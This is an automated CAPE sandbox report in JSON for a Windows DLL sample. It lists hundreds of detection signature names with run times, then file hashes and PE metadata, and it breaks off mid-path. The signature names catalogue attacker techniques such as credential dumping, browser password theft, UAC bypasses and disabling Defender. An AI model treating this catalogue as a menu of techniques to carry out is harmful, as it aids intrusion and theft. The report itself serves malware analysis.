{"_id":{"$oid":"691862880999409cf96ec55b"},"statistics":{"processing":[{"name":"CAPE","time":0.9},{"name":"AnalysisInfo","time":0.011},{"name":"BehaviorAnalysis","time":0.007},{"name":"Debug","time":0.001},{"name":"NetworkAnalysis","time":14.436},{"name":"UrlAnalysis","time":0},{"name":"script_log_processing","time":0},{"name":"ProcessMemory","time":0}],"signatures":[{"name":"packer_themida","time":0},{"name":"stealth_network","time":0},{"name":"disable_driver_via_blocklist","time":0},{"name":"disable_driver_via_hvcidisallowedimages","time":0},{"name":"disable_hypervisor_protected_code_integrity","time":0},{"name":"pendingfilerenameoperations_Operations","time":0},{"name":"anomalous_deletefile","time":0},{"name":"antiav_360_libs","time":0},{"name":"antiav_ahnlab_libs","time":0},{"name":"antiav_avast_libs","time":0},{"name":"antiav_bitdefender_libs","time":0},{"name":"antiav_bullgaurd_libs","time":0},{"name":"antiav_emsisoft_libs","time":0},{"name":"antiav_qurb_libs","time":0},{"name":"antiav_servicestop","time":0},{"name":"antiav_apioverride_libs","time":0},{"name":"antidebug_guardpages","time":0},{"name":"antiav_nthookengine_libs","time":0},{"name":"antidebug_outputdebugstring","time":0},{"name":"antidebug_windows","time":0},{"name":"antisandbox_cuckoo","time":0},{"name":"antisandbox_cuckoocrash","time":0},{"name":"antisandbox_foregroundwindows","time":0},{"name":"mouse_movement_detect","time":0},{"name":"antisandbox_sboxie_libs","time":0},{"name":"antisandbox_script_timer","time":0},{"name":"antisandbox_sleep","time":0},{"name":"antisandbox_sunbelt_libs","time":0},{"name":"antisandbox_unhook","time":0},{"name":"antivm_directory_objects","time":0},{"name":"antivm_generic_disk","time":0},{"name":"antivm_generic_system","time":0},{"name":"antivm_checks_available_memory","time":0},{"name":"detect_virtualization_via_recent_files","time":0},{"name":"antivm_vbox_libs","time":0},{"name":"antivm_vmware_events","time":0},{"name":"antivm_vmware_libs","time":0},{"name":"api_spamming","time":0},{"name":"api_uuidfromstringa","time":0},{"name":"bcdedit_command","time":0},{"name":"bootkit","time":0},{"name":"potential_overwrite_mbr","time":0},{"name":"suspicious_ioctl_scsipassthough","time":0},{"name":"suspicious_iocontrol_codes","time":0},{"name":"browser_needed","time":0},{"name":"regsvr32_squiblydoo_dll_load","time":0},{"name":"uac_bypass_cmstp","time":0},{"name":"uac_bypass_eventvwr","time":0},{"name":"uac_bypass_windows_Backup","time":0},{"name":"dotnet_code_compile","time":0},{"name":"queries_computer_name","time":0},{"name":"queries_user_name","time":0},{"name":"creates_largekey","time":0},{"name":"creates_nullvalue","time":0},{"name":"access_windows_passwords_vault","time":0},{"name":"lsass_credential_dumping","time":0},{"name":"critical_process","time":0},{"name":"cryptopool_domains","time":0},{"name":"dead_connect","time":0},{"name":"dead_link","time":0},{"name":"decoy_document","time":0},{"name":"decoy_image","time":0},{"name":"deletes_consolehost_history","time":0},{"name":"dep_bypass","time":0},{"name":"dep_disable","time":0},{"name":"disables_wfp","time":0},{"name":"add_windows_defender_exclusions","time":0},{"name":"dll_load_uncommon_file_types","time":0},{"name":"document_script_exe_drop","time":0},{"name":"guloader_apis","time":0},{"name":"driver_load","time":0},{"name":"dynamic_function_loading","time":0},{"name":"encrypted_ioc","time":0},{"name":"exec_crash","time":0},{"name":"process_creation_suspicious_location","time":0},{"name":"exploit_getbasekerneladdress","time":0},{"name":"exploit_gethaldispatchtable","time":0},{"name":"exploit_heapspray","time":0},{"name":"koadic_apis","time":0},{"name":"koadic_network_activity","time":0},{"name":"downloads_from_filehosting","time":0},{"name":"generic_phish","time":0},{"name":"http_request","time":0},{"name":"infostealer_browser","time":0},{"name":"infostealer_browser_password","time":0},{"name":"infostealer_cookies","time":0},{"name":"cryptbot_network","time":0},{"name":"purplewave_network_activity","time":0},{"name":"quilclipper_behavior","time":0},{"name":"raccoon_behavior","time":0},{"name":"captures_screenshot","time":0},{"name":"vidar_behavior","time":0},{"name":"injection_createremotethread","time":0},{"name":"injection_explorer","time":0},{"name":"injection_network_traffic","time":0},{"name":"injection_runpe","time":0},{"name":"injection_rwx","time":0},{"name":"injection_themeinitapihook","time":0},{"name":"resumethread_remote_process","time":0},{"name":"injection_write_exe_process","time":0},{"name":"injection_write_process","time":0},{"name":"internet_dropper","time":0},{"name":"escalate_privilege_via_named_pipe","time":0},{"name":"ipc_namedpipe","time":0},{"name":"js_phish","time":0},{"name":"js_suspicious_redirect","time":0},{"name":"loader_alien","time":0},{"name":"execute_binary_via_internet_explorer_exporter","time":0},{"name":"execute_binary_via_run_exe_helper_utility","time":0},{"name":"execute_ps_via_syncappvpublishingserver","time":0},{"name":"malicious_dynamic_function_loading","time":0},{"name":"encrypt_pcinfo","time":0},{"name":"encrypt_data_agenttesla_http","time":0},{"name":"encrypt_data_agentteslat2_http","time":0},{"name":"encrypt_data_nanocore","time":0},{"name":"reads_memory_remote_process","time":0},{"name":"mimics_filetime","time":0},{"name":"amsi_bypass_via_com_registry","time":0},{"name":"access_auto_logons_via_registry","time":0},{"name":"access_boot_key_via_registry","time":0},{"name":"create_suspicious_lnk_files","time":0},{"name":"credential_access_via_windows_credential_history","time":0},{"name":"dll_hijacking_via_microsoft_exchange","time":0},{"name":"dll_hijacking_via_waas_medic_svc_com_typelib","time":0},{"name":"execute_file_downloaded_via_openssh","time":0},{"name":"execute_safe_mode_from_suspicious_process","time":0},{"name":"execute_scripts_via_microsoft_management_console","time":0},{"name":"execute_suspicious_processes_via_windows_mssql_service","time":0},{"name":"execution_from_self_extracting_archive","time":0},{"name":"ip_address_discovery_via_trusted_program","time":0},{"name":"load_dll_via_control_panel","time":0},{"name":"network_connection_via_suspicious_process","time":0},{"name":"potential_location_discovery_via_unusual_process","time":0},{"name":"store_executable_registry","time":0},{"name":"Suspicious_Execution_Via_MicrosoftExchangeTransportAgent","time":0},{"name":"suspicious_java_execution_via_win_scripts","time":0},{"name":"Suspicious_Scheduled_Task_Creation_Via_Masqueraded_XML_File","time":0},{"name":"uses_restart_manager_for_suspicious_activities","time":0},{"name":"modify_desktop_wallpaper","time":0},{"name":"move_file_on_reboot","time":0},{"name":"multiple_useragents","time":0},{"name":"network_anomaly","time":0},{"name":"network_bind","time":0},{"name":"network_cnc_https_archive","time":0},{"name":"network_cnc_https_free_webshoting","time":0},{"name":"network_cnc_https_generic","time":0},{"name":"network_cnc_https_temp_urldns","time":0},{"name":"network_cnc_https_opensource","time":0},{"name":"network_cnc_https_pastesite","time":0},{"name":"network_cnc_https_payload","time":0},{"name":"network_cnc_https_serviceinterface","time":0},{"name":"network_cnc_https_socialmedia","time":0},{"name":"network_cnc_https_telegram","time":0},{"name":"network_cnc_https_tempstorage","time":0},{"name":"network_cnc_https_urlshortener","time":0},{"name":"network_cnc_https_useragent","time":0},{"name":"network_cnc_smtps_exfil","time":0},{"name":"network_cnc_smtps_generic","time":0},{"name":"network_dns_idn","time":0},{"name":"network_dns_suspicious_querytype","time":0},{"name":"network_dns_tunneling_request","time":0},{"name":"network_document_http","time":0},{"name":"explorer_http","time":0},{"name":"network_fake_useragent","time":0},{"name":"legitimate_domain_abuse","time":0},{"name":"suspicious_communication_trusted_site","time":0},{"name":"network_tor","time":0},{"name":"office_com_load","time":0},{"name":"office_dotnet_load","time":0},{"name":"office_mshtml_load","time":0},{"name":"office_vb_load","time":0},{"name":"office_wmi_load","time":0},{"name":"office_cve2017_11882","time":0},{"name":"office_cve2017_11882_network","time":0},{"name":"office_cve_2021_40444","time":0},{"name":"office_cve_2021_40444_m2","time":0},{"name":"office_flash_load","time":0},{"name":"office_postscript","time":0},{"name":"office_suspicious_processes","time":0},{"name":"office_write_exe","time":0},{"name":"persistence_via_autodial_dll_registry","time":0},{"name":"persistence_autorun","time":0},{"name":"persistence_autorun_tasks","time":0},{"name":"persistence_bootexecute","time":0},{"name":"persistence_registry_script","time":0},{"name":"powershell_network_connection","time":0},{"name":"powershell_download","time":0},{"name":"powershell_request","time":0},{"name":"createtoolhelp32snapshot_module_enumeration","time":0},{"name":"enumerates_running_processes","time":0},{"name":"process_interest","time":0},{"name":"process_needed","time":0},{"name":"mass_data_encryption","time":0},{"name":"ransomware_file_modifications","time":0},{"name":"nemty_network_activity","time":0},{"name":"nemty_note","time":0},{"name":"sodinokibi_behavior","time":0},{"name":"stop_ransomware_registry","time":0},{"name":"blackrat_apis","time":0},{"name":"blackrat_network_activity","time":0},{"name":"blackrat_registry_keys","time":0},{"name":"dcrat_behavior","time":0},{"name":"karagany_system_event_objects","time":0},{"name":"rat_luminosity","time":0},{"name":"rat_nanocore","time":0},{"name":"netwire_behavior","time":0},{"name":"obliquerat_network_activity","time":0},{"name":"orcusrat_behavior","time":0},{"name":"trochilusrat_apis","time":0},{"name":"reads_self","time":0},{"name":"recon_beacon","time":0},{"name":"recon_programs","time":0},{"name":"recon_systeminfo","time":0},{"name":"accesses_recyclebin","time":0},{"name":"remcos_shell_code_dynamic_wrapper_x","time":0},{"name":"script_created_process","time":0},{"name":"script_network_activity","time":0},{"name":"suspicious_js_script","time":0},{"name":"javascript_timer","time":0},{"name":"secure_login_phishing","time":0},{"name":"securityxploded_modules","time":0},{"name":"get_clipboard_data","time":0},{"name":"sets_autoconfig_url","time":0},{"name":"spoofs_procname","time":0},{"name":"stack_pivot","time":0},{"name":"stack_pivot_file_created","time":0},{"name":"stack_pivot_process_create","time":0},{"name":"set_clipboard_data","time":0},{"name":"stealth_childproc","time":0},{"name":"stealth_file","time":0},{"name":"stealth_timeout","time":0},{"name":"stealth_window","time":0},{"name":"queries_keyboard_layout","time":0},{"name":"queries_locale_api","time":0},{"name":"terminates_remote_process","time":0},{"name":"uiautomationcore_load","time":0},{"name":"user_enum","time":0},{"name":"virus","time":0},{"name":"neshta_files","time":0},{"name":"neshta_regkeys","time":0},{"name":"webmail_phish","time":0},{"name":"persists_dev_util","time":0},{"name":"spawns_dev_util","time":0},{"name":"alters_windows_utility","time":0},{"name":"overwrites_accessibility_utility","time":0},{"name":"Potential_Lateral_Movement_Via_SMBEXEC","time":0},{"name":"potential_WebShell_Via_ScreenConnectServer","time":0},{"name":"uses_Microsoft_HTML_Help_Executable","time":0},{"name":"wiper_zeroedbytes","time":0},{"name":"wmi_create_process","time":0},{"name":"wmi_script_process","time":0},{"name":"antianalysis_tls_section","time":0},{"name":"antivirus_clamav","time":0},{"name":"antivirus_virustotal","time":0},{"name":"bad_certs","time":0},{"name":"bad_ssl_certs","time":0},{"name":"banker_zeus_p2p","time":0},{"name":"banker_zeus_url","time":0},{"name":"binary_yara","time":0},{"name":"bot_athenahttp","time":0},{"name":"bot_dirtjumper","time":0},{"name":"bot_drive","time":0},{"name":"bot_drive2","time":0},{"name":"bot_madness","time":0},{"name":"phishing_kit_detected","time":0},{"name":"family_proxyback","time":0},{"name":"flare_capa_antianalysis","time":0},{"name":"flare_capa_collection","time":0},{"name":"flare_capa_communication","time":0},{"name":"flare_capa_compiler","time":0},{"name":"flare_capa_datamanipulation","time":0},{"name":"flare_capa_executable","time":0},{"name":"flare_capa_hostinteraction","time":0},{"name":"flare_capa_impact","time":0},{"name":"flare_capa_lib","time":0},{"name":"flare_capa_linking","time":0},{"name":"flare_capa_loadcode","time":0},{"name":"flare_capa_malwarefamily","time":0},{"name":"flare_capa_nursery","time":0},{"name":"flare_capa_persistence","time":0},{"name":"flare_capa_runtime","time":0},{"name":"flare_capa_targeting","time":0},{"name":"threatfox","time":0},{"name":"log4shell","time":0},{"name":"mimics_extension","time":0},{"name":"network_country_distribution","time":0},{"name":"network_cnc_http","time":0.006},{"name":"network_ip_exe","time":0.001},{"name":"network_dga","time":0},{"name":"network_dga_fraunhofer","time":0},{"name":"network_dyndns","time":0},{"name":"network_excessive_udp","time":0},{"name":"network_http","time":0.002},{"name":"network_icmp","time":0},{"name":"network_irc","time":0},{"name":"network_open_proxy","time":0},{"name":"network_questionable_http_path","time":0},{"name":"network_questionable_https_path","time":0},{"name":"network_smtp","time":0},{"name":"network_torgateway","time":0},{"name":"origin_langid","time":0},{"name":"origin_resource_langid","time":0},{"name":"overlay","time":0},{"name":"packer_unknown_pe_section_name","time":0},{"name":"packer_aspack","time":0},{"name":"packer_aspirecrypt","time":0},{"name":"packer_bedsprotector","time":0},{"name":"packer_confuser","time":0},{"name":"packer_enigma","time":0},{"name":"packer_entropy","time":0},{"name":"packer_mpress","time":0},{"name":"packer_nate","time":0},{"name":"packer_nspack","time":0},{"name":"packer_smartassembly","time":0},{"name":"packer_spices","time":0},{"name":"packer_themida","time":0},{"name":"packer_titan","time":0},{"name":"packer_upx","time":0},{"name":"packer_vmprotect","time":0},{"name":"packer_yoda","time":0},{"name":"pdf_annot_urls_checker","time":0},{"name":"polymorphic","time":0},{"name":"punch_plus_plus_pcres","time":0},{"name":"procmem_yara","time":0},{"name":"recon_checkip","time":0},{"name":"static_authenticode","time":0},{"name":"invalid_authenticode_signature","time":0},{"name":"static_dotnet_anomaly","time":0},{"name":"static_java","time":0},{"name":"static_pdf","time":0},{"name":"contains_pe_overlay","time":0},{"name":"static_pe_anomaly","time":0},{"name":"pe_compile_timestomping","time":0},{"name":"static_pe_pdbpath","time":0},{"name":"static_rat_config","time":0},{"name":"static_versioninfo_anomaly","time":0},{"name":"suricata_alert","time":0},{"name":"suspicious_html_body","time":0},{"name":"suspicious_html_name","time":0},{"name":"suspicious_html_title","time":0},{"name":"volatility_devicetree_1","time":0},{"name":"volatility_handles_1","time":0},{"name":"volatility_ldrmodules_1","time":0},{"name":"volatility_ldrmodules_2","time":0},{"name":"volatility_malfind_1","time":0},{"name":"volatility_malfind_2","time":0},{"name":"volatility_modscan_1","time":0},{"name":"volatility_svcscan_1","time":0},{"name":"volatility_svcscan_2","time":0},{"name":"volatility_svcscan_3","time":0},{"name":"whois_create","time":0},{"name":"accesses_mailslot","time":0},{"name":"accesses_netlogon_regkey","time":0},{"name":"accesses_public_folder","time":0},{"name":"accesses_sysvol","time":0},{"name":"writes_sysvol","time":0},{"name":"adds_admin_user","time":0},{"name":"adds_user","time":0},{"name":"overwrites_admin_password","time":0},{"name":"antianalysis_detectfile","time":0.001},{"name":"antianalysis_detectreg","time":0},{"name":"modify_attachment_manager","time":0},{"name":"antiav_detectfile","time":0.001},{"name":"antiav_detectreg","time":0.002},{"name":"antiav_srp","time":0},{"name":"antiav_whitespace","time":0},{"name":"antidebug_devices","time":0},{"name":"antiemu_windefend","time":0},{"name":"antiemu_wine_reg","time":0},{"name":"antisandbox_cuckoo_files","time":0},{"name":"antisandbox_fortinet_files","time":0},{"name":"antisandbox_joe_anubis_files","time":0},{"name":"antisandbox_sboxie_mutex","time":0},{"name":"antisandbox_sunbelt_files","time":0},{"name":"antisandbox_threattrack_files","time":0},{"name":"antivm_bochs_keys","time":0},{"name":"antivm_generic_bios","time":0},{"name":"antivm_generic_diskreg","time":0},{"name":"antivm_hyperv_keys","time":0},{"name":"antivm_parallels_keys","time":0},{"name":"antivm_recentdocs","time":0},{"name":"antivm_vbox_devices","time":0},{"name":"antivm_vbox_files","time":0},{"name":"antivm_vbox_keys","time":0},{"name":"antivm_vmware_devices","time":0},{"name":"antivm_vmware_files","time":0},{"name":"antivm_vmware_keys","time":0},{"name":"antivm_vmware_mutexes","time":0},{"name":"antivm_vpc_files","time":0},{"name":"antivm_vpc_keys","time":0},{"name":"antivm_vpc_mutex","time":0},{"name":"antivm_xen_keys","time":0},{"name":"asyncrat_mutex","time":0},{"name":"gulpix_behavior","time":0},{"name":"ketrican_regkeys","time":0},{"name":"okrum_mutexes","time":0},{"name":"banker_cridex","time":0},{"name":"geodo_banking_trojan","time":0},{"name":"banker_spyeye_mutexes","time":0},{"name":"banker_zeus_mutex","time":0},{"name":"bitcoin_opencl","time":0},{"name":"accesses_primary_patition","time":0},{"name":"direct_hdd_access","time":0},{"name":"enumerates_physical_drives","time":0},{"name":"physical_drive_access","time":0},{"name":"bot_russkill","time":0},{"name":"browser_addon","time":0},{"name":"chromium_browser_extension_directory","time":0},{"name":"browser_helper_object","time":0},{"name":"browser_security","time":0},{"name":"browser_startpage","time":0},{"name":"ie_disables_process_tab","time":0},{"name":"odbcconf_bypass","time":0},{"name":"squiblydoo_bypass","time":0},{"name":"squiblytwo_bypass","time":0},{"name":"bypass_chromium_protection","time":0},{"name":"bypass_firewall","time":0},{"name":"checks_uac_status","time":0},{"name":"uac_bypass_cmstpcom","time":0},{"name":"uac_bypass_delegateexecute_sdclt","time":0},{"name":"uac_bypass_fodhelper","time":0},{"name":"cape_extracted_content","time":0},{"name":"carberp_mutex","time":0},{"name":"clears_logs","time":0},{"name":"cmdline_obfuscation","time":0},{"name":"cmdline_switches","time":0},{"name":"cmdline_terminate","time":0},{"name":"cmdline_forfiles_wildcard","time":0},{"name":"cmdline_http_link","time":0},{"name":"cmdline_long_string","time":0},{"name":"cmdline_reversed_http_link","time":0},{"name":"long_commandline","time":0},{"name":"powershell_renamed_commandline","time":0},{"name":"copies_self","time":0},{"name":"credwiz_credentialaccess","time":0},{"name":"enables_wdigest","time":0},{"name":"vaultcmd_credentialaccess","time":0},{"name":"file_credential_store_access","time":0},{"name":"file_credential_store_write","time":0},{"name":"kerberos_credential_access_via_rubeus","time":0},{"name":"registry_credential_dumping","time":0},{"name":"registry_credential_store_access","time":0},{"name":"registry_lsa_secrets_access","time":0},{"name":"comsvcs_credentialdump","time":0},{"name":"cryptomining_stratum_command","time":0},{"name":"cypherit_mutexes","time":0},{"name":"darkcomet_regkeys","time":0},{"name":"datop_loader","time":0},{"name":"deepfreeze_mutex","time":0},{"name":"deletes_executed_files","time":0},{"name":"disables_app_launch","time":0},{"name":"disables_auto_app_termination","time":0},{"name":"disables_appv_virtualization","time":0},{"name":"disables_backups","time":0},{"name":"disables_browser_warn","time":0},{"name":"disables_context_menus","time":0},{"name":"disables_cpl_disable","time":0},{"name":"disables_crashdumps","time":0},{"name":"disables_event_logging","time":0},{"name":"disables_folder_options","time":0},{"name":"disables_notificationcenter","time":0},{"name":"disables_power_options","time":0},{"name":"disables_restore_default_state","time":0},{"name":"disables_run_command","time":0},{"name":"disables_smartscreen","time":0},{"name":"disables_startmenu_search","time":0},{"name":"disables_system_restore","time":0},{"name":"disables_uac","time":0},{"name":"disables_wer","time":0},{"name":"disables_windows_defender","time":0},{"name":"disables_windows_defender_logging","time":0},{"name":"removes_windows_defender_contextmenu","time":0},{"name":"removes_windows_defender_updates","time":0},{"name":"windows_defender_powershell","time":0},{"name":"disables_windows_file_protection","time":0},{"name":"disables_windowsupdate","time":0},{"name":"disables_winfirewall","time":0},{"name":"adfind_domain_enumeration","time":0},{"name":"domain_enumeration_commands","time":0},{"name":"andromut_mutexes","time":0},{"name":"downloader_cabby","time":0},{"name":"phorpiex_mutexes","time":0},{"name":"protonbot_mutexes","time":0},{"name":"driver_filtermanager","time":0},{"name":"dropper","time":0},{"name":"dll_archive_execution","time":0},{"name":"lnk_archive_execution","time":0},{"name":"script_archive_execution","time":0},{"name":"excel4_macro_urls","time":0},{"name":"escalate_privilege_via_ntlm_relay","time":0},{"name":"spooler_access","time":0},{"name":"spooler_svc_start","time":0},{"name":"mapped_drives_uac","time":0},{"name":"hides_recycle_bin_icon","time":0},{"name":"apocalypse_stealer_file_behavior","time":0},{"name":"arkei_files","time":0},{"name":"azorult_mutexes","time":0},{"name":"infostealer_bitcoin","time":0.001},{"name":"cryptbot_files","time":0},{"name":"echelon_files","time":0},{"name":"infostealer_ftp","time":0.001},{"name":"infostealer_im","time":0.001},{"name":"infostealer_mail","time":0},{"name":"masslogger_files","time":0},{"name":"poullight_files","time":0},{"name":"purplewave_mutexes","time":0},{"name":"quilclipper_mutexes","time":0},{"name":"qulab_files","time":0},{"name":"qulab_mutexes","time":0},{"name":"asyncrat_mutex","time":0},{"name":"Evade_Execution_Via_ASPNet_Compiler","time":0},{"name":"Evade_Execute_Via_DeviceCredentialDeployment","time":0},{"name":"Evade_Execution_Via_Filter_Manager_Control","time":0},{"name":"Evade_Execution_Via_Intel_GFXDownloadWrapper","time":0},{"name":"execute_binary_via_appvlp","time":0},{"name":"execute_binary_via_pcalua","time":0},{"name":"Execute_Binary_Via_OpenSSH","time":0},{"name":"execute_binary_via_pcalua","time":0},{"name":"Execute_Binary_Via_PesterPSModule","time":0},{"name":"Execute_Binary_Via_ScriptRunner","time":0},{"name":"execute_binary_via_ttdinject","time":0},{"name":"Execute_Binary_Via_VisualStudioLiveShare","time":0},{"name":"Execute_Msiexec_Via_Explorer","time":0},{"name":"execute_remote_msi","time":0},{"name":"execute_suspicious_powershell_via_runscripthelper","time":0},{"name":"execute_suspicious_powershell_via_sqlps","time":0},{"name":"Indirect_Command_Execution_Via_ConsoleWindowHost","time":0},{"name":"Perform_Malicious_Activities_Via_Headless_Browser","time":0},{"name":"Register_DLL_Via_CertOC","time":0},{"name":"Register_DLL_Via_MSIEXEC","time":0},{"name":"Register_DLL_Via_Odbcconf","time":0},{"name":"Scriptlet_Proxy_Execution_Via_Pubprn","time":0},{"name":"ie_martian_children","time":0},{"name":"office_martian_children","time":0},{"name":"mimics_icon","time":0},{"name":"masquerade_process_name","time":0.001},{"name":"mimikatz_modules","time":0},{"name":"ms_office_cmd_rce","time":0},{"name":"mount_copy_to_webdav_share","time":0},{"name":"potential_protocol_tunneling_via_legit_utilities","time":0},{"name":"potential_protocol_tunneling_via_qemu","time":0},{"name":"suspicious_execution_via_dotnet_remoting","time":0},{"name":"modify_certs","time":0},{"name":"dotnet_clr_usagelog_regkeys","time":0},{"name":"modify_hostfile","time":0},{"name":"modify_oem_information","time":0},{"name":"modify_security_center_warnings","time":0},{"name":"modify_uac_prompt","time":0},{"name":"network_dns_blockchain","time":0},{"name":"network_dns_opennic","time":0},{"name":"network_dns_paste_site","time":0},{"name":"network_dns_reverse_proxy","time":0},{"name":"network_dns_temp_file_storage","time":0},{"name":"network_dns_temp_urldns","time":0},{"name":"network_dns_url_shortener","time":0},{"name":"network_dns_doh_tls","time":0},{"name":"suspicious_tld","time":0},{"name":"network_tor_service","time":0},{"name":"office_code_page","time":0},{"name":"office_addinloading","time":0},{"name":"office_perfkey","time":0},{"name":"office_macro","time":0},{"name":"changes_trust_center_settings","time":0},{"name":"disables_vba_trust_access","time":0},{"name":"office_macro_autoexecution","time":0},{"name":"office_macro_ioc","time":0},{"name":"office_macro_malicious_prediction","time":0},{"name":"office_macro_suspicious","time":0},{"name":"rtf_aslr_bypass","time":0},{"name":"rtf_anomaly_characterset","time":0},{"name":"rtf_anomaly_version","time":0},{"name":"rtf_embedded_content","time":0},{"name":"rtf_embedded_office_file","time":0},{"name":"rtf_exploit_static","time":0},{"name":"office_security","time":0},{"name":"accesses_office_username","time":0},{"name":"office_anomalous_feature","time":0},{"name":"office_dde_command","time":0},{"name":"packer_armadillo_mutex","time":0},{"name":"packer_armadillo_regkey","time":0},{"name":"persistence_ads","time":0},{"name":"persistence_safeboot","time":0},{"name":"persistence_ifeo","time":0},{"name":"persistence_silent_process_exit","time":0},{"name":"persistence_rdp_registry","time":0},{"name":"persistence_rdp_shadowing","time":0},{"name":"persistence_service","time":0},{"name":"persistence_shim_database","time":0},{"name":"powerpool_mutexes","time":0},{"name":"powershell_scriptblock_logging","time":0},{"name":"powershell_command_suspicious","time":0},{"name":"powershell_renamed","time":0},{"name":"powershell_reversed","time":0},{"name":"powershell_variable_obfuscation","time":0},{"name":"prevents_safeboot","time":0},{"name":"cmdline_process_discovery","time":0},{"name":"cryptomix_mutexes","time":0},{"name":"dharma_mutexes","time":0},{"name":"ransomware_extensions","time":0.001},{"name":"ransomware_files","time":0.002},{"name":"fonix_mutexes","time":0},{"name":"gandcrab_mutexes","time":0},{"name":"germanwiper_mutexes","time":0},{"name":"medusalocker_mutexes","time":0},{"name":"medusalocker_regkeys","time":0},{"name":"nemty_mutexes","time":0},{"name":"nemty_regkeys","time":0},{"name":"pysa_mutexes","time":0},{"name":"ransomware_radamant","time":0},{"name":"ransomware_recyclebin","time":0},{"name":"revil_mutexes","time":0},{"name":"ransomware_revil_regkey","time":0},{"name":"satan_mutexes","time":0},{"name":"snake_ransom_mutexes","time":0},{"name":"stop_ransom_mutexes","time":0},{"name":"stop_ransomware_cmd","time":0},{"name":"ransomware_stopdjvu","time":0},{"name":"rat_beebus_mutexes","time":0},{"name":"blacknet_mutexes","time":0},{"name":"blackrat_mutexes","time":0},{"name":"crat_mutexes","time":0},{"name":"dcrat_files","time":0},{"name":"dcrat_mutexes","time":0},{"name":"rat_fynloski_mutexes","time":0},{"name":"limerat_mutexes","time":0},{"name":"limerat_regkeys","time":0},{"name":"lodarat_file_behavior","time":0},{"name":"modirat_behavior","time":0},{"name":"njrat_regkeys","time":0},{"name":"obliquerat_files","time":0},{"name":"obliquerat_mutexes","time":0},{"name":"parallax_mutexes","time":0},{"name":"rat_pcclient","time":0},{"name":"rat_plugx_mutexes","time":0},{"name":"rat_poisonivy_mutexes","time":0},{"name":"rat_quasar_mutexes","time":0},{"name":"ratsnif_mutexes","time":0},{"name":"rat_spynet","time":0},{"name":"venomrat_mutexes","time":0},{"name":"warzonerat_files","time":0},{"name":"warzonerat_regkeys","time":0},{"name":"xpertrat_files","time":0},{"name":"xpertrat_mutexes","time":0},{"name":"rat_xtreme_mutexes","time":0},{"name":"recon_fingerprint","time":0},{"name":"remcos_files","time":0},{"name":"remcos_mutexes","time":0},{"name":"remcos_regkeys","time":0},{"name":"rdptcp_key","time":0},{"name":"uses_rdp_clip","time":0},{"name":"uses_remote_desktop_session","time":0},{"name":"removes_networking_icon","time":0},{"name":"removes_pinned_programs","time":0},{"name":"removes_security_maintenance_icon","time":0},{"name":"removes_startmenu_defaults","time":0},{"name":"removes_username_startmenu","time":0},{"name":"spicyhotpot_behavior","time":0},{"name":"sniffer_winpcap","time":0},{"name":"spreading_autoruninf","time":0},{"name":"stealth_hidden_extension","time":0},{"name":"stealth_hiddenreg","time":0},{"name":"stealth_hide_notifications","time":0},{"name":"stealth_webhistory","time":0},{"name":"sysinternals_psexec","time":0},{"name":"sysinternals_tools","time":0},{"name":"language_check_registry","time":0},{"name":"tampers_etw","time":0},{"name":"lsa_tampering","time":0},{"name":"tampers_powershell_logging","time":0},{"name":"targeted_flame","time":0},{"name":"territorial_disputes_sigs","time":0.001},{"name":"trickbot_mutex","time":0},{"name":"fleercivet_mutex","time":0},{"name":"lokibot_mutexes","time":0},{"name":"ursnif_behavior","time":0},{"name":"uses_adfind","time":0},{"name":"uses_ms_protocol","time":0},{"name":"neshta_mutexes","time":0},{"name":"renamer_mutexes","time":0},{"name":"owa_web_shell_files","time":0},{"name":"web_shell_files","time":0},{"name":"web_shell_processes","time":0},{"name":"dotnet_csc_build","time":0},{"name":"mavinject_lolbin","time":0},{"name":"multiple_explorer_instances","time":0},{"name":"script_tool_executed","time":0},{"name":"suspicious_certutil_use","time":0},{"name":"suspicious_command_tools","time":0},{"name":"suspicious_mpcmdrun_use","time":0},{"name":"suspicious_ping_use","time":0},{"name":"uses_powershell_copyitem","time":0},{"name":"uses_windows_utilities","time":0},{"name":"uses_windows_utilities_appcmd","time":0},{"name":"uses_windows_utilities_csvde_ldifde","time":0},{"name":"uses_windows_utilities_cipher","time":0},{"name":"uses_windows_utilities_clickonce","time":0},{"name":"uses_windows_utilities_curl","time":0},{"name":"uses_windows_utilities_dsquery","time":0},{"name":"uses_windows_utilities_esentutl","time":0},{"name":"uses_windows_utilities_finger","time":0},{"name":"uses_windows_utilities_mode","time":0},{"name":"uses_windows_utilities_ntdsutil","time":0},{"name":"uses_windows_utilities_nltest","time":0},{"name":"uses_windows_utilities_xcopy","time":0},{"name":"wmic_command_suspicious","time":0},{"name":"scrcons_wmi_script_consumer","time":0},{"name":"allaple_mutexes","time":0}],"reporting":[{"name":"BinGraph","time":0}]},"target":{"category":"file","file":{"name":"cf9cdd5d26283d31c43e.dll","path":"/opt/CAPEv2/storage/binaries/cf9cdd5d26283d31c43eb4df35a0dfc867da74441e5363890a84b988d8514c62","guest_paths":"","size":52224,"crc32":"F13B7F8F","md5":"40784dca35fa06d4c4cb932e101e56ab","sha1":"b105724b5bee4ad43b23cf35d8d29ff231f94aec","sha256":"cf9cdd5d26283d31c43eb4df35a0dfc867da74441e5363890a84b988d8514c62","sha512":"cecf9ae77462eacf1b71b0bfbb6a2bfe8f51b0204d97badf9429abe81f291bfdfbfc1ab074511de157d0a0fadade491256d02f1e6b4b5367f4556343705d63d1","rh_hash":null,"ssdeep":"1536:9NKW7bUJASj9+gJjprSuC/q69XE4knG8z0b:fKW7bUJASj9+gJj5Yq691+0b","type":"PE32 executable (DLL) (GUI) Intel 80386, for MS Windows","yara":[],"cape_yara":[],"clamav":[],"tlsh":"T1DD33E522E913D177D38D0EB0E9079E5ACE796CA6CFE071C3FB911DEA08209D5A739605","sha3_384":"d9349b6d5a3120cdfd315ca96ca4336c1734481ecf19375cb3cf57900eabf1bef75d803073164d4265cd2e85e643de72","pe":{"guest_signers":{"aux_sha1":null,"aux_timestamp":null,"aux_valid":false,"aux_error":true,"aux_error_desc":"No signature found.","aux_signers":[]},"digital_signers":[],"imagebase":"0x10000000","entrypoint":"0x00006eaf","ep_bytes":"558bec837d0c017505e8fb070000ff75","peid_signatures":null,"reported_checksum":"0x00000000","actual_checksum":"0x00014291","osversion":"6.0","pdbpath":"C:\\Users\\lengo\\Desktop\\Spamming 